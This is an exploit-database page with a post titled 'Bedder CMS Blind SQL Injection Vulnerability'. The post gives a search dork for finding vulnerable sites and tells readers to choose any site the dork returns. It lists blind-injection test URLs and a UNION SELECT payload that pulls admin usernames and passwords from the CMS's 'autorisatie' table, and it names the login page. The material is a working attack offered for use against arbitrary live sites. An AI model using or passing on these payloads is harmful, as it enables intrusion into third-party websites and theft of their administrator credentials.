[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bedder CMS Blind SQL Injection Vulnerability

Author
^Xecuti0N3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15872
Category
web applications
Date add
17-04-2011
Platform
php
#(+)Exploit Title: Bedder CMS Blind SQL Injection Vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) Date    : 15.04.2011
#(+) Hour    : 13:37 PM
#(+) E-mail  :  xecuti0n3r()yahoo.com
#(+) dork    : intext:"Design by Bedder"
#(+) Category  : Web Apps [Blind SQli]
 
____________________________________________________________________
____________________________________________________________________
 
Choose any site that comes up when you enter the dork intext:"Design by Bedder" in search engine
 
 
    *Blind SQL injection Vulnerability*
     
 
 
#   [+]True : http://site.com/teams.php?id=1 and 1=1--
#   [+]False: http://site.com/teams.php?id=1 and 1=2--
#   [+]eViL : http://site.com/teams.php?id=[SQLi]
 
 
 
#   [+]True : http://site.com/activiteiten.php?id=91 and 1=1--
#   [+]False: http://site.com/activiteiten.php?id=91 and 1=2--
#   [+]eViL : http://site.com/activiteiten.php?id=[SQLi]
 
 
#   [+]Cms Login Page is at : http://site.com/cms/index.php
 
#      [+]evIL: teams.php?id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie
 
 
 
____________________________________________________________________
____________________________________________________________________
 
########################################################################
(+)Exploit Coded by: ^Xecuti0n3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################



#  0day.today [2024-09-28]  #